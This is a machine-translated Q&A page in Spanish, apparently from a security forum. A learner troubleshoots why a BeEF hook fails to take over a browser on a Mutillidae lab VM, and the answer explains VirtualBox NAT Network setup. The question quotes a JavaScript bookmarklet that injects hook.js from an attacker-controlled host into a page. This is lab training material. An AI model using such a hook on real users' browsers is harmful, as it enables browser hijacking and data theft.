Cómo configurar un gancho de carne en el navegador de otra máquina virtual en una red NAT en VirtualBox

Navega tus respuestas
2

Estoy leyendo "Pruebas prácticas de penetración web". Estoy usando VirtualBox para ejecutar dos máquinas virtuales: Windows 7 con Mutillidae y KaliLinux donde quiero usar Beef. Ambos están conectados a una red Nat 10.0.2.0/24.

Como se dice en el libro, configuré el KaliLinux para tener una IP estática modificando /etc/network/interfaces : 

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

#Static IP Address
auto eth0
iface eth0 inet static
    address 10.0.2.99
    netmask 255.255.255.0
    network 10.0.2.0
    broadcast 10.0.2.255
    gateway 10.0.2.1

Mi máquina virtual de Windows tiene IP 10.0.2.4.

Ahora estoy tratando de configurar la carne de vacuno. Cuando abro una pestaña en cada uno de los navegadores de estas máquinas virtuales para http://10.0.2.99:3000/demos/basic.html , efectivamente, los navegadores se enganchan como navegadores en línea en el panel de la interfaz de usuario.

Pero quiero tener un gancho en Mutillidae. Hay un botón para que se copie como un marcador para agregar el archivo hook.js para una página web determinada: javascript: (function () { var url = 'http://10.0.2.99:3000/hook.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();

Cuando lo ejecuto en cualquiera de los navegadores de VM, abierto en http://10.0.2.4/mutillidae/index.php , no funciona. El archivo hook.js se carga, puedo verlo en firebug. Pero el navegador nunca se "engancha": no puedo verlo en el panel de carne.

Incluso modifiqué esta parte de /etc/beef-xss/config.yaml : 

# Reverse Proxy / NAT
        # If BeEF is running behind a reverse proxy or NAT
        #  set the public hostname and port here
        public: "10.0.2.99"      # public hostname/IP address
        #public_port: "" # experimental

E hice algunas investigaciones pero nada ...

Algunas cosas raras (¿o es eso normal?):

Desde Kali 10.0.2.99 

ping 10.0.2.99    - OK
ping 10.0.2.4     - KO --> But I can access 10.0.2.4/mutillidae/ !
ping 10.0.2.1     - OK
ping 10.0.2.0  -b - KO --> shouldn't I get answers from myself and gateway at least?

Desde W7 10.0.2.4 

ping 10.0.2.99    - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js
ping 10.0.2.4     - OK
ping 10.0.2.1     - OK
ping 10.0.2.0     - KO --> Reply from 10.0.2.4: Destination host unreachable. Is this why Kali can't access W7?

¿Por qué no puedo configurar un gancho en Mutillidae en Win7 VM conectado a la misma red Nat que Kali VM?

Gracias.

Si necesitas más detalles para ayudarme, no lo dudes. Editaré mi pregunta para ayudarte a ayudarme.

    
pregunta Hillfias 12.10.2018 - 16:21
fuente

1 respuesta

0

Por lo general, cuando hago pruebas de piratería entre dos máquinas virtuales, configuro dos adaptadores en cada una. Primero en cada uno como "NAT". Esa interfaz proporcionará acceso a Internet a través de mi host (pero debe saber que la red NAT será una red diferente para cada vm). El segundo será como "Red NAT" y esa será la red que compartirán las máquinas virtuales.

Para configurar esta interfaz de red secundaria, primero deberá configurar el rango de NatNetwork en su Virtualbox. Haga clic en "Archivo", "Preferencias", "Red". Haga clic en el símbolo "más" para crear uno. Se establecerá como "NatNetwork". Luego haz clic en el ícono del engranaje para configurarlo. Puedes ver mi captura de pantalla (lo siento, la captura de pantalla está en español):

Luego,configurándolopuedeconfigurarcualquierrangodered.Pongoenestecaso12.0.0.0/24paratenerunrangonoconflictivo.

Después de eso, debe configurar la interfaz de red secundaria en cada máquina virtual. Haga clic en el vm, configuración, red y habilitado la interfaz de red secundaria seleccionando "Nat Network" y su red creada.

Si haces esto en ambas máquinas, las máquinas tendrán una interfaz de red secundaria en la red 12.0.0.0/24 y verán la otra máquina sin problemas en esa red. Obtendrán una ip por DHCP y podrás realizar cualquier prueba de piratería.

Por supuesto, hay más formas de hacer eso, pero esta es fácil y funciona. Buena suerte.

    
respondido por el OscarAkaElvis 27.10.2018 - 08:43
fuente

Lea otras preguntas en las etiquetas

¿Un servidor SSH en ejecución podría engañar al cliente SSH conectado para crear un puerto inverso hacia adelante? auditoría SOC 2 para pequeñas empresas (6 empleados) sin departamento de TI [cerrado]